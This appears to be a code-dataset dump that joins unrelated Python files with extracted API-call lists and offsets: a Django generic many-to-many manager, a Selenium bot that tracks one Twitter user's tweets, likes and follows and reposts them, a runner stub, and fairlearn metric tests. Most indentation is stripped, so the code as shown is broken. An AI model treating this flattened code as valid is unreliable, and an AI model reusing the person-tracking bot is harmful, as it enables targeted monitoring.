:param *objs: object instances to add
"""
#
self._check_through_model('add')
if not objs:
return
db = router.db_for_write(self.through, instance=self.instance)
self._do_add(db, self._to_add(objs, db))
add.alters_data = True
def _do_remove(self, db, q):
"""
        Performs items removal from a Q object
"""
self.through._default_manager.using(db).filter(q).delete()
def remove(self, *objs):
"""
Removes objects from the GM2M field
"""
# *objs - objects to remove
self._check_through_model('remove')
if not objs:
return
db = router.db_for_write(self.through, instance=self.instance)
self._do_remove(db, self._to_remove(objs))
remove.alters_data = True
def _do_clear(self, db, filter=None):
self.through._default_manager.using(db).filter(**(filter or {})) \
.delete()
def set(self, objs, **kwargs):
"""
Sets the objs iterable as the set of related objects
(Added for compatibility with Django 1.9)
"""
self._check_through_model('set')
objs = tuple(objs)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.through, instance=self.instance)
if clear:
# clears all and re-adds
self._do_clear(db)
            self._do_add(db, self._to_add(objs, db))
else:
# just removes the necessary items and adds the missing ones
to_add, to_remove = self._to_change(objs, db)
self._do_remove(db, to_remove)
self._do_add(db, to_add)
set.alters_data = True
def clear(self):
db = router.db_for_write(self.through, instance=self.instance)
self._do_clear(db, self._to_clear())
clear.alters_data = True
class GM2MBaseSrcManager(Manager):
def __init__(self, instance):
# the manager's model is the source model
super(GM2MBaseSrcManager, self).__init__(instance)
self.core_filters['%s__%s' % (self.query_field_name,
self.field_names['tgt_ct'])] = \
get_content_type(self.instance)
self.core_filters['%s__%s' % (self.query_field_name,
self.field_names['tgt_fk'])] = \
self.instance.pk
def _get_prefetch_queryset_params(self, instances, queryset, db):
# we're looking for generic target instances, which should be
# converted to (content_type, primary_key) tuples
q = Q()
for obj in instances:
q = q | Q(**{
'%s__%s' % (self.query_field_name,
self.field_names['tgt_ct']):get_content_type(obj),
'%s__%s' % (self.query_field_name,
self.field_names['tgt_fk']): obj.pk
})
# Annotating the query in order to retrieve the primary model
# content type and id in the same query
# content type must be the 1st element, see rel_obj_attr below
extra_fields = (
self.through._meta.get_field(self.field_names['tgt_ct']),
self.through._meta.get_field(self.field_names['tgt_fk'])
)
qs = self._get_extra_queryset(queryset, q, extra_fields, db)
# primary model retrieval function
def rel_obj_attr(relobj):
t = []
for f in extra_fields:
try:
# t already contains the content type id
# we use get_for_id to retrieve the cached content type
model = ct.ContentType.objects.get_for_id(t[0]) \
.model_class()
except IndexError:
# t is empty
model = ct.ContentType
t.append(model._meta.pk.to_python(
getattr(relobj, '_prefetch_related_val_%s' % f.attname)
))
return tuple(t)
# model attribute retrieval function
instance_attr = lambda inst: \
(get_content_type(inst).pk, inst.pk)
return qs, rel_obj_attr, instance_attr
def _to_add(self, objs, db):
# we're using the reverse relation to add source model
# instances
inst_ct = get_content_type(self.instance)
vals = self.through._default_manager.using(db) \
.values_list(self.field_names['src'],
flat=True) \
.filter(**{
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
})
to_add = []
for obj in objs:
if obj.pk not in vals:
to_add.append(self.through(**{
'%s_id' % self.field_names['src']:
obj.pk,
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
return to_add
def _to_remove(self, objs):
# we're using the reverse relation to delete source model
# instances
inst_ct = get_content_type(self.instance)
return Q(**{
'%s_id__in' % self.field_names['src']:
[obj.pk for obj in objs],
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
})
def _to_change(self, objs, db):
"""
Returns the sets of items to be added and a Q object for removal
"""
inst_ct = get_content_type(self.instance)
vals = list(self.through._default_manager.using(db)
.values_list(self.field_names['src'], flat=True)
.filter(**{
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
to_add = set()
to_remove = set()
for obj in objs:
try:
vals.remove(obj.pk)
except ValueError:
# obj.pk is not in vals and must be added
to_add.add(self.through(**{
'%s_id' % self.field_names['src']:
obj.pk,
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
for v in vals:
to_remove.add(v)
return to_add, Q(pk__in=to_remove)
def _to_clear(self):
return {
self.field_names['tgt_ct']: get_content_type(self.instance),
self.field_names['tgt_fk']: self.instance.pk
}
class GM2MBaseTgtManager(Manager):
def __init__(self, instance):
# the manager's model is the through model
super(GM2MBaseTgtManager, self).__init__(instance)
source_field = self.through._meta.get_field(
self.field_names['src'])
self.source_related_fields = source_field.related_fields
for __, rh_field in self.source_related_fields:
key = '%s__%s' % (self.query_field_name, rh_field.name)
self.core_filters[key] = getattr(self.instance,
rh_field.attname)
def _get_queryset(self, using):
return GM2MTgtQuerySet(self.model, using=using)
def _get_prefetch_queryset_params(self, instances, queryset, db):
# we're looking for through model instances
query = {}
for lh_field, rh_field in self.source_related_fields:
query['%s__in' % lh_field.name] = \
set(getattr(obj, rh_field.attname)
for obj in instances)
q = Q(**query)
# Annotating the query in order to retrieve the primary model
# id in the same query
fk = self.through._meta.get_field(self.field_names['src'])
extra_fields = fk.local_related_fields
qs = self._get_extra_queryset(queryset, q, extra_fields, db)
# marking the queryset so that the original queryset should
# be returned when evaluated the first time
qs._related_prefetching = True
# primary model retrieval function
def rel_obj_attr(relobj):
t = []
for f in extra_fields:
v = getattr(relobj,
'_prefetch_related_val_%s' % f.attname)
try:
v = v.pop()
except AttributeError: # v is not a list
pass
t.append(f.related_model._meta.pk.to_python(v))
return tuple(t)
# model attribute retrieval function
select_fields = fk.foreign_related_fields
instance_attr = lambda inst: tuple([getattr(inst, f.attname)
for f in select_fields])
return qs, rel_obj_attr, instance_attr
def _to_add(self, objs, db):
models = []
objs_set = set()
for obj in objs:
# extract content type and primary key for each object
objs_set.add((get_content_type(obj),
obj.pk))
m = obj.__class__
if m not in models:
# call field.add_relation for each model
models.append(m)
self.field.add_relation(m, auto=True)
vals = self.through._default_manager.using(db) \
.filter(**{self.field_names['src']: self.pk}) \
.values_list(self.field_names['tgt_ct'],
self.field_names['tgt_fk'])
to_add = []
for ct, pk in objs_set.difference(vals):
to_add.append(self.through(**{
'%s_id' % self.field_names['src']: self.pk,
self.field_names['tgt_ct']: ct,
self.field_names['tgt_fk']: pk
}))
return to_add
def _to_remove(self, objs):
q = Q()
for obj in objs:
# Convert the obj to (content_type, primary_key)
q = q | Q(**{
self.field_names['tgt_ct']: get_content_type(obj),
self.field_names['tgt_fk']: obj.pk
})
return q & Q(**{
'%s_id' % self.field_names['src']: self.pk
})
def _to_clear(self):
return {
'%s_id' % self.field_names['src']: self.pk
}
def _to_change(self, objs, db):
"""
Returns the sets of items to be added and a Q object for removal
"""
to_add = set()
src_fname = self.field_names['src']
ct_fname = self.field_names['tgt_ct']
fk_fname = self.field_names['tgt_fk']
vals = list(self.through._default_manager.using(db)
.filter(**{self.field_names['src']: self.pk})
.values_list(ct_fname, fk_fname))
known_cts = set(v[0] for v in vals)
for obj in objs:
ct = get_content_type(obj)
val = (ct, obj.pk)
try:
vals.remove(val)
except ValueError:
# val is not in vals
# extract content type and primary key for each object
to_add.add((ct, obj.pk))
if ct.pk not in known_cts:
# call field.add_relation for each unknown model
self.field.add_relation(obj.__class__, auto=True)
known_cts.add(ct.pk)
rem_q = Q()
for val in vals:
# Convert the obj to (content_type, primary_key)
rem_q = rem_q | Q(**{
ct_fname: val[0],
fk_fname: val[1]
})
return [
self.through(**{
'%s_id' % src_fname: self.pk,
ct_fname: t[0],
fk_fname: t[1]
}) for t in to_add
], \
rem_q & Q(**{
'%s_id' % src_fname: self.pk
})
def create_gm2m_related_manager(superclass=None, **kwargs):
"""
Dynamically create a manager class that only concerns an instance (source
or target)
"""
bases = [GM2MBaseManager]
if superclass is None:
# no superclass provided, the manager is a generic target model manager
bases.insert(0, GM2MBaseTgtManager)
else:
# superclass provided, the manager is a source model manager and also
# derives from superclass
bases.insert(0, GM2MBaseSrcManager)
bases.append(superclass)
# Django's Manager constructor sets model to None, we store it under the
# class's attribute '_model' and it is retrieved in __init__
kwargs['_model'] = kwargs.pop('model')
return type(Manager)('GM2MManager', tuple(bases), kwargs)
| [
"django.db.models.Q",
"django.db.router.db_for_read",
"django.db.router.db_for_write"
]
| [((3080, 3137), 'django.db.router.db_for_write', 'router.db_for_write', (['self.through'], {'instance': 'self.instance'}), '(self.through, instance=self.instance)\n', (3099, 3137), False, 'from django.db import router\n'), ((3642, 3699), 'django.db.router.db_for_write', 'router.db_for_write', (['self.through'], {'instance': 'self.instance'}), '(self.through, instance=self.instance)\n', (3661, 3699), False, 'from django.db import router\n'), ((4238, 4295), 'django.db.router.db_for_write', 'router.db_for_write', (['self.through'], {'instance': 'self.instance'}), '(self.through, instance=self.instance)\n', (4257, 4295), False, 'from django.db import router\n'), ((4720, 4777), 'django.db.router.db_for_write', 'router.db_for_write', (['self.through'], {'instance': 'self.instance'}), '(self.through, instance=self.instance)\n', (4739, 4777), False, 'from django.db import router\n'), ((5611, 5614), 'django.db.models.Q', 'Q', ([], {}), '()\n', (5612, 5614), False, 'from django.db.models import Q, Manager\n'), ((8424, 8574), 'django.db.models.Q', 'Q', ([], {}), "(**{('%s_id__in' % self.field_names['src']): [obj.pk for obj in objs],\n self.field_names['tgt_ct']: inst_ct, self.field_names['tgt_fk']: self.pk})\n", (8425, 8574), False, 'from django.db.models import Q, Manager\n'), ((11089, 11099), 'django.db.models.Q', 'Q', ([], {}), '(**query)\n', (11090, 11099), False, 'from django.db.models import Q, Manager\n'), ((13394, 13397), 'django.db.models.Q', 'Q', ([], {}), '()\n', (13395, 13397), False, 'from django.db.models import Q, Manager\n'), ((14986, 14989), 'django.db.models.Q', 'Q', ([], {}), '()\n', (14987, 14989), False, 'from django.db.models import Q, Manager\n'), ((1186, 1239), 'django.db.router.db_for_read', 'router.db_for_read', (['self.model'], {'instance': 'instances[0]'}), '(self.model, instance=instances[0])\n', (1204, 1239), False, 'from django.db import router\n'), ((9801, 9820), 'django.db.models.Q', 'Q', ([], {'pk__in': 'to_remove'}), '(pk__in=to_remove)\n', (9802, 9820), False, 'from django.db.models import Q, Manager\n'), ((13669, 13720), 'django.db.models.Q', 'Q', ([], {}), "(**{('%s_id' % self.field_names['src']): self.pk})\n", (13670, 13720), False, 'from django.db.models import Q, Manager\n'), ((15107, 15148), 'django.db.models.Q', 'Q', ([], {}), '(**{ct_fname: val[0], fk_fname: val[1]})\n', (15108, 15148), False, 'from django.db.models import Q, Manager\n'), ((15423, 15460), 'django.db.models.Q', 'Q', ([], {}), "(**{('%s_id' % src_fname): self.pk})\n", (15424, 15460), False, 'from django.db.models import Q, Manager\n'), ((743, 810), 'django.db.router.db_for_read', 'router.db_for_read', (['self.instance.__class__'], {'instance': 'self.instance'}), '(self.instance.__class__, instance=self.instance)\n', (761, 810), False, 'from django.db import router\n')] |
from selenium.webdriver.chrome.options import Options
from selenium import webdriver
import logging
import coloredlogs
import os
import pathlib
import time
import twitter as tt
from utils import retry
from fetch_likes import get_user_likes, login
from conf.settings import USER_ID, USERNAME, PASSWORD
CURR_PATH = pathlib.Path(__file__).parent.absolute()
TWEETS_FOLDER = os.path.join(CURR_PATH, 'screenshots')
LIKED_FOLDER = os.path.join(CURR_PATH, 'screenshots', 'liked')
class TwitterListener():
def __init__(self, user_id=USER_ID, search_base=40):
# Configure log
coloredlogs.install()
logging.basicConfig()
self.logger = logging.getLogger('TwitterListener')
self.logger.setLevel(logging.DEBUG)
# Set chrome options
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument("--no-sandbox")
self.driver = webdriver.Chrome(options=chrome_options)
# Create formatter, file handler and add they to the handlers
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh = logging.FileHandler('twitter.log')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
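        # search_base: number of recent tweets fetched per polling pass
        # (the likes check uses half of it).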
self.search_base = search_base
self.user_id = user_id
self.target = tt.get_username_from_id(user_id)
        self.is_logged = False
self.has_previous_tweets = False
self.has_previous_friends = False
self.has_previous_likes = False
def _get_new_tweets(self):
if(not self.has_previous_tweets):
self.previous_tweets_ids = tt.get_ids_from_tweets(
tt.get_tweets(user_id=self.user_id, count=self.search_base))
self.has_previous_tweets = True
last_tweets = tt.get_tweets(user_id=self.user_id,
count=self.search_base)
last_tweets_ids = tt.get_ids_from_tweets(last_tweets)
diff_tweets = self._get_new_diff(
last_tweets_ids, self.previous_tweets_ids)
if diff_tweets:
new_tweets = [last_tweets[i] for i in range(len(diff_tweets))]
self.previous_tweets_ids = last_tweets_ids
new_tweets.reverse()
return new_tweets
return []
def _get_new_likes(self):
count = self.search_base/2
if(not self.is_logged):
login(self.driver, USERNAME, PASSWORD)
self.is_logged = True
if(not self.has_previous_likes):
self.previous_likes_ids = get_user_likes(
self.driver, self.target, count=count)
self.has_previous_likes = True
new_likes_ids = get_user_likes(
self.driver, self.target, count=count)
diff_tweets = self._get_new_diff(
new_likes_ids, self.previous_likes_ids)
if diff_tweets:
self.previous_likes_ids = new_likes_ids
diff_tweets.reverse()
return diff_tweets
return []
def _get_new_diff(self, curr, old):
count = len(old)
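        # ids arrive newest-first, so only the newest half of the current ids is
        # diffed against the previous snapshot; anything unseen there is new.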
return list(set(curr[:count//2]) -
set(old))
def _get_abs_diff(self, first_list, second_list):
return list(set(first_list) - set(second_list))
def print_new_tweets(self):
try:
new_tweets = self._get_new_tweets()
for tweet in new_tweets:
tweet_id = str(tweet['id'])
tweet_url = tt.get_url(tweet)
# Get image
self.logger.info('New tweet %s', tweet_url)
img_path = os.path.join(TWEETS_FOLDER, f'{tweet_id}.png')
retry(tt.print_tweet, tweet_url,
self.driver, output_path=img_path)
self.logger.debug('Take a screenshot of tweet')
# Tweet image
tweet_msg = '<NAME> acabou de twittar'
self.logger.debug(
f'Is a retweet: {"retweeted_status" in tweet}')
if('retweeted_status' in tweet):
tweet_msg = '<NAME> acabou de retweetar'
tt.tweet_print(img_path, tweet_url, tweet_msg)
self.logger.debug('Tweet the screenshot')
except Exception as e:
self.logger.error(e)
def print_new_likes(self):
try:
new_likes = self._get_new_likes()
for t_id in new_likes:
t_url = f'https://twitter.com/{self.target}/status/{t_id}'
# Get image
self.logger.info('New like %s', t_url)
img_path = os.path.join(LIKED_FOLDER, f'{t_id}.png')
retry(tt.print_tweet, t_url, self.driver, output_path=img_path)
self.logger.debug('Take a screenshot of tweet')
# Tweet image
t_msg = '<NAME> acabou de curtir esse tweet'
tt.tweet_print(img_path, t_url, t_msg)
self.logger.debug('Tweet the screenshot')
except Exception as e:
self.logger.error(e)
def watch_friends(self):
try:
if(not self.has_previous_friends):
self.previous_friends = tt.get_friends_ids(
user_id=self.user_id)
self.has_previous_friends = True
last_friends = tt.get_friends_ids()
new_friends = self._get_abs_diff(
last_friends, self.previous_friends)
unfriends = self._get_abs_diff(self.previous_friends, last_friends)
for user_id in new_friends:
username = tt.get_username_from_id(user_id=user_id)
self.logger.info(f'New friend: @{username}')
retry(
tt.update_status,
status=(
f'<NAME> aparentemente está seguindo @{username}.'
'\n(Esse bot não consegue verificar se essa atualização foi gerada '
'por um follow ou por uma reativação de conta)'
)
)
for user_id in unfriends:
username = tt.get_username_from_id(user_id=user_id)
self.logger.info(f'Unfriend: @{username}')
retry(
tt.update_status,
status=(
f'<NAME> aparentemente deixou de seguir @{username}.'
'\n(Esse bot não consegue verificar se essa atualização foi gerada '
'por um unfollow, suspensão ou block.)'
)
)
self.previous_friends = last_friends
except Exception as e:
self.logger.error(e)
| [
"logging.basicConfig",
"selenium.webdriver.chrome.options.Options",
"logging.getLogger",
"twitter.get_username_from_id",
"twitter.get_url",
"coloredlogs.install",
"twitter.get_tweets",
"pathlib.Path",
"selenium.webdriver.Chrome",
"logging.Formatter",
"os.path.join",
"fetch_likes.get_user_likes",
"fetch_likes.login",
"twitter.get_friends_ids",
"logging.FileHandler",
"twitter.get_ids_from_tweets",
"twitter.tweet_print",
"utils.retry"
]
| [((373, 411), 'os.path.join', 'os.path.join', (['CURR_PATH', '"""screenshots"""'], {}), "(CURR_PATH, 'screenshots')\n", (385, 411), False, 'import os\n'), ((427, 474), 'os.path.join', 'os.path.join', (['CURR_PATH', '"""screenshots"""', '"""liked"""'], {}), "(CURR_PATH, 'screenshots', 'liked')\n", (439, 474), False, 'import os\n'), ((591, 612), 'coloredlogs.install', 'coloredlogs.install', ([], {}), '()\n', (610, 612), False, 'import coloredlogs\n'), ((621, 642), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (640, 642), False, 'import logging\n'), ((665, 701), 'logging.getLogger', 'logging.getLogger', (['"""TwitterListener"""'], {}), "('TwitterListener')\n", (682, 701), False, 'import logging\n'), ((801, 810), 'selenium.webdriver.chrome.options.Options', 'Options', ([], {}), '()\n', (808, 810), False, 'from selenium.webdriver.chrome.options import Options\n'), ((935, 975), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'options': 'chrome_options'}), '(options=chrome_options)\n', (951, 975), False, 'from selenium import webdriver\n'), ((1066, 1139), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""'], {}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n", (1083, 1139), False, 'import logging\n'), ((1166, 1200), 'logging.FileHandler', 'logging.FileHandler', (['"""twitter.log"""'], {}), "('twitter.log')\n", (1185, 1200), False, 'import logging\n'), ((1364, 1396), 'twitter.get_username_from_id', 'tt.get_username_from_id', (['user_id'], {}), '(user_id)\n', (1387, 1396), True, 'import twitter as tt\n'), ((1834, 1893), 'twitter.get_tweets', 'tt.get_tweets', ([], {'user_id': 'self.user_id', 'count': 'self.search_base'}), '(user_id=self.user_id, count=self.search_base)\n', (1847, 1893), True, 'import twitter as tt\n'), ((1956, 1991), 'twitter.get_ids_from_tweets', 'tt.get_ids_from_tweets', (['last_tweets'], {}), '(last_tweets)\n', (1978, 1991), True, 'import twitter as tt\n'), ((2728, 2781), 'fetch_likes.get_user_likes', 'get_user_likes', (['self.driver', 'self.target'], {'count': 'count'}), '(self.driver, self.target, count=count)\n', (2742, 2781), False, 'from fetch_likes import get_user_likes, login\n'), ((316, 338), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (328, 338), False, 'import pathlib\n'), ((2437, 2475), 'fetch_likes.login', 'login', (['self.driver', 'USERNAME', 'PASSWORD'], {}), '(self.driver, USERNAME, PASSWORD)\n', (2442, 2475), False, 'from fetch_likes import get_user_likes, login\n'), ((2589, 2642), 'fetch_likes.get_user_likes', 'get_user_likes', (['self.driver', 'self.target'], {'count': 'count'}), '(self.driver, self.target, count=count)\n', (2603, 2642), False, 'from fetch_likes import get_user_likes, login\n'), ((5376, 5396), 'twitter.get_friends_ids', 'tt.get_friends_ids', ([], {}), '()\n', (5394, 5396), True, 'import twitter as tt\n'), ((1706, 1765), 'twitter.get_tweets', 'tt.get_tweets', ([], {'user_id': 'self.user_id', 'count': 'self.search_base'}), '(user_id=self.user_id, count=self.search_base)\n', (1719, 1765), True, 'import twitter as tt\n'), ((3503, 3520), 'twitter.get_url', 'tt.get_url', (['tweet'], {}), '(tweet)\n', (3513, 3520), True, 'import twitter as tt\n'), ((3637, 3683), 'os.path.join', 'os.path.join', (['TWEETS_FOLDER', 'f"""{tweet_id}.png"""'], {}), "(TWEETS_FOLDER, f'{tweet_id}.png')\n", (3649, 3683), False, 'import os\n'), ((3700, 3767), 'utils.retry', 'retry', (['tt.print_tweet', 'tweet_url', 'self.driver'], {'output_path': 'img_path'}), 
'(tt.print_tweet, tweet_url, self.driver, output_path=img_path)\n', (3705, 3767), False, 'from utils import retry\n'), ((4171, 4217), 'twitter.tweet_print', 'tt.tweet_print', (['img_path', 'tweet_url', 'tweet_msg'], {}), '(img_path, tweet_url, tweet_msg)\n', (4185, 4217), True, 'import twitter as tt\n'), ((4652, 4693), 'os.path.join', 'os.path.join', (['LIKED_FOLDER', 'f"""{t_id}.png"""'], {}), "(LIKED_FOLDER, f'{t_id}.png')\n", (4664, 4693), False, 'import os\n'), ((4710, 4773), 'utils.retry', 'retry', (['tt.print_tweet', 't_url', 'self.driver'], {'output_path': 'img_path'}), '(tt.print_tweet, t_url, self.driver, output_path=img_path)\n', (4715, 4773), False, 'from utils import retry\n'), ((4946, 4984), 'twitter.tweet_print', 'tt.tweet_print', (['img_path', 't_url', 't_msg'], {}), '(img_path, t_url, t_msg)\n', (4960, 4984), True, 'import twitter as tt\n'), ((5237, 5277), 'twitter.get_friends_ids', 'tt.get_friends_ids', ([], {'user_id': 'self.user_id'}), '(user_id=self.user_id)\n', (5255, 5277), True, 'import twitter as tt\n'), ((5645, 5685), 'twitter.get_username_from_id', 'tt.get_username_from_id', ([], {'user_id': 'user_id'}), '(user_id=user_id)\n', (5668, 5685), True, 'import twitter as tt\n'), ((5763, 5969), 'utils.retry', 'retry', (['tt.update_status'], {'status': 'f"""<NAME> aparentemente está seguindo @{username}.\n(Esse bot não consegue verificar se essa atualização foi gerada por um follow ou por uma reativação de conta)"""'}), '(tt.update_status, status=\n f"""<NAME> aparentemente está seguindo @{username}.\n(Esse bot não consegue verificar se essa atualização foi gerada por um follow ou por uma reativação de conta)"""\n )\n', (5768, 5969), False, 'from utils import retry\n'), ((6183, 6223), 'twitter.get_username_from_id', 'tt.get_username_from_id', ([], {'user_id': 'user_id'}), '(user_id=user_id)\n', (6206, 6223), True, 'import twitter as tt\n'), ((6299, 6500), 'utils.retry', 'retry', (['tt.update_status'], {'status': 'f"""<NAME> aparentemente deixou de seguir @{username}.\n(Esse bot não consegue verificar se essa atualização foi gerada por um unfollow, suspensão ou block.)"""'}), '(tt.update_status, status=\n f"""<NAME> aparentemente deixou de seguir @{username}.\n(Esse bot não consegue verificar se essa atualização foi gerada por um unfollow, suspensão ou block.)"""\n )\n', (6304, 6500), False, 'from utils import retry\n')] |
from runner import runner
if __name__ == '__main__':
r = runner()
p = 'public class main{public static void main (String[] args){' \
'public String StudentAnswer(String myInput){' \
'return "myOutput"; ' \
'}System.out.println("hello world!");}}'
print (r.sendCode(p, '')) | [
"runner.runner"
]
| [((62, 70), 'runner.runner', 'runner', ([], {}), '()\n', (68, 70), False, 'from runner import runner\n')] |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import pytest
import numpy as np
import sklearn.metrics as skm
import fairlearn.metrics as metrics
# ======================================================
a = "a"
b = "b"
c = "c"
Y_true = [0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
Y_pred = [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
Y_true_ternary = [a, b, c, c, c, b, b, b, c, c, a, a, a, a, a, b, c, c]
Y_pred_ternary = [b, c, c, c, b, b, b, b, b, c, a, a, c, a, a, b, c, c]
groups = [3, 4, 1, 0, 0, 0, 3, 2, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4]
weight = [1, 2, 3, 1, 2, 3, 4, 2, 3, 3, 2, 1, 2, 3, 1, 2, 3, 4]
group2 = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
# =======================================================
# Define the metric pairs explicitly so that the actual names can be seen
# when pytest builds the tests
supported_metrics_weighted = [(skm.accuracy_score, metrics.group_accuracy_score),
(skm.confusion_matrix, metrics.group_confusion_matrix),
(skm.zero_one_loss, metrics.group_zero_one_loss)]
# The following only work with binary data when called with their default arguments
supported_metrics_weighted_binary = [(skm.precision_score, metrics.group_precision_score),
(skm.recall_score, metrics.group_recall_score),
(skm.roc_auc_score, metrics.group_roc_auc_score),
(skm.mean_squared_error, metrics.group_mean_squared_error),
(skm.r2_score, metrics.group_r2_score)]
supported_metrics_weighted_binary = supported_metrics_weighted_binary + supported_metrics_weighted
metrics_no_sample_weights = [(skm.max_error, metrics.group_max_error),
(skm.mean_absolute_error, metrics.group_mean_absolute_error),
(skm.mean_squared_log_error, metrics.group_mean_squared_log_error),
(skm.median_absolute_error, metrics.group_median_absolute_error)]
supported_metrics_unweighted = metrics_no_sample_weights + supported_metrics_weighted_binary
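# Each tuple above pairs an sklearn metric with its fairlearn group_* wrapper.
# The parametrized tests below only check that the wrapper's .overall value
# matches the plain sklearn call and that .by_group holds one entry per unique
# group (5 here).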
# =======================================================
@pytest.mark.parametrize("func_tuple", supported_metrics_unweighted)
def test_metric_unweighted(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true, Y_pred, groups)
# We don't really care about the numbers (sklearn is responsible)
# We just want to make sure we got a result
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true, Y_pred)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
@pytest.mark.parametrize("func_tuple", supported_metrics_weighted_binary)
def test_metric_weighted(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true, Y_pred, groups, sample_weight=weight)
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true, Y_pred, sample_weight=weight)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
@pytest.mark.parametrize("func_tuple", supported_metrics_weighted)
def test_metric_weighted_ternary(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true_ternary, Y_pred_ternary, groups, sample_weight=weight)
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true_ternary, Y_pred_ternary, sample_weight=weight)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
# ======================================================================================
def test_group_accuracy_score_unnormalized():
result = metrics.group_accuracy_score(Y_true, Y_pred, groups, normalize=False)
expected_overall = skm.accuracy_score(Y_true, Y_pred, False)
assert result.overall == expected_overall
# ======================================================================================
def test_group_confusion_matrix_labels():
labels = [0, 4]
result = metrics.group_confusion_matrix(Y_true, Y_pred, groups, labels=labels)
expected_overall = skm.confusion_matrix(Y_true, Y_pred, labels=labels)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_precision_score_ternary():
result = metrics.group_precision_score(Y_true_ternary, Y_pred_ternary, group2, average=None)
expected_overall = skm.precision_score(Y_true_ternary, Y_pred_ternary, average=None)
assert np.array_equal(result.overall, expected_overall)
def test_group_precision_score_pos_label():
result = metrics.group_precision_score(Y_true, Y_pred, groups, pos_label=0)
expected_overall = skm.precision_score(Y_true, Y_pred, pos_label=0)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_recall_score_ternary():
result = metrics.group_recall_score(Y_true_ternary, Y_pred_ternary, group2, average=None)
expected_overall = skm.recall_score(Y_true_ternary, Y_pred_ternary, average=None)
assert np.array_equal(result.overall, expected_overall)
def test_group_recall_score_pos_label():
result = metrics.group_recall_score(Y_true, Y_pred, groups, pos_label=0)
expected_overall = skm.recall_score(Y_true, Y_pred, pos_label=0)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_roc_auc_score_average():
result = metrics.group_roc_auc_score(Y_true, Y_pred, groups, average='samples')
expected_overall = skm.roc_auc_score(Y_true, Y_pred, average='samples')
assert expected_overall == result.overall
def test_group_roc_auc_score_max_fpr():
result = metrics.group_roc_auc_score(Y_true, Y_pred, groups, max_fpr=0.5)
expected_overall = skm.roc_auc_score(Y_true, Y_pred, max_fpr=0.5)
assert expected_overall == result.overall
# ======================================================================================
def test_group_zero_one_loss_unnormalized():
result = metrics.group_zero_one_loss(Y_true, Y_pred, groups, normalize=False)
expected_overall = skm.zero_one_loss(Y_true, Y_pred, False)
assert result.overall == expected_overall
# =============================================================================================
def test_group_mean_squared_error_multioutput_single_ndarray():
y_t = np.random.rand(len(groups), 2)
y_p = np.random.rand(len(groups), 2)
result = metrics.group_mean_squared_error(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.mean_squared_error(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
# =============================================================================================
def test_group_r2_score_multioutput():
y_t = np.random.rand(len(groups), 2)
y_p = np.random.rand(len(groups), 2)
result = metrics.group_r2_score(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.r2_score(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
for target_group in np.unique(groups):
mask = np.asarray(groups) == target_group
expected = skm.r2_score(y_t[mask], y_p[mask], multioutput='raw_values')
assert np.array_equal(result.by_group[target_group], expected)
# =============================================================================================
def test_group_mean_squared_error_multioutput_list_ndarray():
y_t = [np.random.rand(2) for x in groups]
y_p = [np.random.rand(2) for x in groups]
result = metrics.group_mean_squared_error(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.mean_squared_error(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
for target_group in np.unique(groups):
y_true = []
y_pred = []
for i in range(len(groups)):
if groups[i] == target_group:
y_true.append(y_t[i])
y_pred.append(y_p[i])
expected = skm.mean_squared_error(y_true, y_pred, multioutput='raw_values')
assert np.array_equal(result.by_group[target_group], expected)
| [
"numpy.random.rand",
"sklearn.metrics.precision_score",
"sklearn.metrics.recall_score",
"sklearn.metrics.roc_auc_score",
"sklearn.metrics.r2_score",
"sklearn.metrics.zero_one_loss",
"fairlearn.metrics.group_accuracy_score",
"numpy.asarray",
"fairlearn.metrics.group_roc_auc_score",
"fairlearn.metrics.group_precision_score",
"fairlearn.metrics.group_mean_squared_error",
"sklearn.metrics.confusion_matrix",
"fairlearn.metrics.group_confusion_matrix",
"fairlearn.metrics.group_zero_one_loss",
"sklearn.metrics.mean_squared_error",
"fairlearn.metrics.group_r2_score",
"sklearn.metrics.accuracy_score",
"numpy.unique",
"pytest.mark.parametrize",
